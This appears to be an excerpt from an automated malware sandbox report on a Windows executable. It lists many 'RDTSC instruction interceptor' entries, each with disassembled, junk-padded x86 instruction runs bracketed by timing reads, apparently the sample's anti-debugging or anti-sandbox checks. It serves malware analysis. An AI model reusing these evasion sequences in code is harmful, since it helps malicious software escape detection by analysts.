                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B02A1 second address: 53B02BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1CC8B8C9EDh 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B02BB second address: 53B0306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov di, 7E3Eh 0x00000011 pushfd 0x00000012 jmp 00007F1CC8BB7C3Fh 0x00000017 sbb cl, FFFFFFEEh 0x0000001a jmp 00007F1CC8BB7C49h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0306 second address: 53B030C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B030C second address: 53B0310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0310 second address: 53B032D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1CC8B8C9F0h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B032D second address: 53B0331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0331 second address: 53B0337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0337 second address: 53B0350 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0350 second address: 53B0354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0354 second address: 53B035A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B035A second address: 53B0360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0360 second address: 53B03E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1CC8BB7C48h 0x00000011 or ax, 4258h 0x00000016 jmp 00007F1CC8BB7C3Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F1CC8BB7C48h 0x00000022 jmp 00007F1CC8BB7C45h 0x00000027 popfd 0x00000028 popad 0x00000029 je 00007F1D3A735E86h 0x0000002f jmp 00007F1CC8BB7C3Eh 0x00000034 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000003b pushad 0x0000003c mov edi, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 movzx eax, bx 0x00000043 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B03E8 second address: 53B0418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007F1D3A70AC22h 0x0000000d jmp 00007F1CC8B8C9F1h 0x00000012 mov edx, dword ptr [esi+44h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F1CC8B8C9EDh 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0418 second address: 53B0428 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C3Ch 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0428 second address: 53B0439 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or edx, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop edi 0x00000010 popad 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0439 second address: 53B0490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f pushad 0x00000010 jmp 00007F1CC8BB7C3Ch 0x00000015 mov bl, ah 0x00000017 popad 0x00000018 jne 00007F1D3A735E5Ah 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 call 00007F1CC8BB7C46h 0x00000026 pop esi 0x00000027 jmp 00007F1CC8BB7C3Bh 0x0000002c popad 0x0000002d rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0490 second address: 53B0496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0496 second address: 53B04C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [esi+48h], 00000001h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1CC8BB7C45h 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B04C2 second address: 53B054C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CC8B8C9F7h 0x00000009 xor si, 141Eh 0x0000000e jmp 00007F1CC8B8C9F9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F1CC8B8C9F0h 0x0000001a xor cl, 00000018h 0x0000001d jmp 00007F1CC8B8C9EBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 jne 00007F1D3A70AB68h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jmp 00007F1CC8B8C9EBh 0x00000034 jmp 00007F1CC8B8C9F8h 0x00000039 popad 0x0000003a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B054C second address: 53B0564 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test bl, 00000007h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0564 second address: 53B0568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0568 second address: 53B056C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B056C second address: 53B0572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0572 second address: 53B0578 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0578 second address: 53B057C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B057C second address: 53B0580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A07C0 second address: 53A07F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1CC8B8C9F3h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A07F5 second address: 53A07F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A07F9 second address: 53A07FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A07FF second address: 53A083E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CC8BB7C42h 0x00000009 and cx, CB98h 0x0000000e jmp 00007F1CC8BB7C3Bh 0x00000013 popfd 0x00000014 mov ch, 9Dh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F1CC8BB7C3Bh 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A083E second address: 53A0842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0842 second address: 53A08D5 instructions: 0x00000000 rdtsc 0x00000002 call 00007F1CC8BB7C40h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a movsx edi, si 0x0000000d popad 0x0000000e and esp, FFFFFFF8h 0x00000011 pushad 0x00000012 mov di, ax 0x00000015 jmp 00007F1CC8BB7C44h 0x0000001a popad 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F1CC8BB7C3Eh 0x00000023 xor esi, 41AB5AB8h 0x00000029 jmp 00007F1CC8BB7C3Bh 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007F1CC8BB7C48h 0x00000035 xor si, 9518h 0x0000003a jmp 00007F1CC8BB7C3Bh 0x0000003f popfd 0x00000040 popad 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F1CC8BB7C3Bh 0x0000004b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A08D5 second address: 53A08D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A08D9 second address: 53A08DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A08DF second address: 53A08FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A08FE second address: 53A0904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0904 second address: 53A0913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8B8C9EBh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0913 second address: 53A0925 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bl, 3Dh 0x0000000e movzx ecx, bx 0x00000011 popad 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0925 second address: 53A0978 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b jmp 00007F1CC8B8C9F9h 0x00000010 mov esi, dword ptr [ebp+08h] 0x00000013 jmp 00007F1CC8B8C9EEh 0x00000018 sub ebx, ebx 0x0000001a jmp 00007F1CC8B8C9F1h 0x0000001f test esi, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov bh, 54h 0x00000026 movzx ecx, di 0x00000029 popad 0x0000002a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0978 second address: 53A09C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F1D3A73D63Ah 0x0000000f jmp 00007F1CC8BB7C40h 0x00000014 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushfd 0x0000001f jmp 00007F1CC8BB7C3Ch 0x00000024 sbb esi, 36C86DB8h 0x0000002a jmp 00007F1CC8BB7C3Bh 0x0000002f popfd 0x00000030 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A09C9 second address: 53A0A5A instructions: 0x00000000 rdtsc 0x00000002 mov ax, 31EFh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushfd 0x0000000a jmp 00007F1CC8B8C9EBh 0x0000000f sbb ecx, 2D86777Eh 0x00000015 jmp 00007F1CC8B8C9F9h 0x0000001a popfd 0x0000001b pop eax 0x0000001c popad 0x0000001d mov ecx, esi 0x0000001f jmp 00007F1CC8B8C9F7h 0x00000024 je 00007F1D3A712370h 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F1CC8B8C9F4h 0x00000031 xor ecx, 1574ACD8h 0x00000037 jmp 00007F1CC8B8C9EBh 0x0000003c popfd 0x0000003d movzx eax, di 0x00000040 popad 0x00000041 test byte ptr [76FB6968h], 00000002h 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b mov si, E723h 0x0000004f popad 0x00000050 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0A5A second address: 53A0AC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F1D3A73D57Ah 0x0000000f jmp 00007F1CC8BB7C40h 0x00000014 mov edx, dword ptr [ebp+0Ch] 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F1CC8BB7C3Eh 0x0000001e sub cl, FFFFFFC8h 0x00000021 jmp 00007F1CC8BB7C3Bh 0x00000026 popfd 0x00000027 mov esi, 28C4963Fh 0x0000002c popad 0x0000002d xchg eax, ebx 0x0000002e pushad 0x0000002f call 00007F1CC8BB7C40h 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0AC4 second address: 53A0AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push eax 0x00000007 pop edi 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F1CC8B8C9F6h 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0AEB second address: 53A0AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0AEF second address: 53A0B1E instructions: 0x00000000 rdtsc 0x00000002 call 00007F1CC8B8C9EAh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ax, dx 0x0000000d popad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1CC8B8C9F9h 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0B1E second address: 53A0B2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C3Ch 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0BAF second address: 53A0BB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0BB5 second address: 53A0C11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CC8BB7C3Ch 0x00000009 add al, FFFFFFC8h 0x0000000c jmp 00007F1CC8BB7C3Bh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pop ebx 0x00000016 jmp 00007F1CC8BB7C45h 0x0000001b mov esp, ebp 0x0000001d jmp 00007F1CC8BB7C3Eh 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 jmp 00007F1CC8BB7C3Dh 0x0000002b mov edx, esi 0x0000002d popad 0x0000002e rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C0008 second address: 53C000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C000C second address: 53C0012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C0012 second address: 53C007C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F1CC8B8C9ECh 0x00000012 sub al, 00000068h 0x00000015 jmp 00007F1CC8B8C9EBh 0x0000001a popfd 0x0000001b call 00007F1CC8B8C9F8h 0x00000020 pop eax 0x00000021 popad 0x00000022 mov bh, C2h 0x00000024 popad 0x00000025 push eax 0x00000026 jmp 00007F1CC8B8C9EDh 0x0000002b xchg eax, ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F1CC8B8C9EDh 0x00000033 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C007C second address: 53C008C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C3Ch 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C008C second address: 53C0090 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C0090 second address: 53C00F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1CC8BB7C3Dh 0x00000011 adc si, 6546h 0x00000016 jmp 00007F1CC8BB7C41h 0x0000001b popfd 0x0000001c movzx esi, bx 0x0000001f popad 0x00000020 pop ebp 0x00000021 pushad 0x00000022 mov si, dx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushfd 0x00000028 jmp 00007F1CC8BB7C3Bh 0x0000002d add ah, 0000007Eh 0x00000030 jmp 00007F1CC8BB7C49h 0x00000035 popfd 0x00000036 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0D3F second address: 53B0DC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F1CC8B8C9ECh 0x00000013 sbb eax, 5AF98988h 0x00000019 jmp 00007F1CC8B8C9EBh 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 jmp 00007F1CC8B8C9F5h 0x00000027 pop ebp 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F1CC8B8C9ECh 0x0000002f jmp 00007F1CC8B8C9F5h 0x00000034 popfd 0x00000035 call 00007F1CC8B8C9F0h 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5430B6B second address: 5430B6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5430B6F second address: 5430B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5430B75 second address: 5430B7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5430B7B second address: 5430C04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d movzx ecx, di 0x00000010 mov cx, dx 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 push eax 0x00000017 pushfd 0x00000018 jmp 00007F1CC8B8C9F1h 0x0000001d and esi, 79C2B686h 0x00000023 jmp 00007F1CC8B8C9F1h 0x00000028 popfd 0x00000029 pop esi 0x0000002a pushfd 0x0000002b jmp 00007F1CC8B8C9F1h 0x00000030 or ah, FFFFFFE6h 0x00000033 jmp 00007F1CC8B8C9F1h 0x00000038 popfd 0x00000039 popad 0x0000003a xchg eax, ebp 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F1CC8B8C9EDh 0x00000042 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5420EA3 second address: 5420EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5420EA7 second address: 5420EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5420EAB second address: 5420EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5420D2F second address: 5420D6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CC8B8C9F1h 0x00000009 add ax, B426h 0x0000000e jmp 00007F1CC8B8C9F1h 0x00000013 popfd 0x00000014 mov ax, 4957h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esp], ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5420D6B second address: 5420D7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5420D7A second address: 5420D80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5420D80 second address: 5420D8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5420D8F second address: 5420D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, 7DC5h 0x00000008 popad 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5420D98 second address: 5420D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5420D9E second address: 5420DA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C03F8 second address: 53C03FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
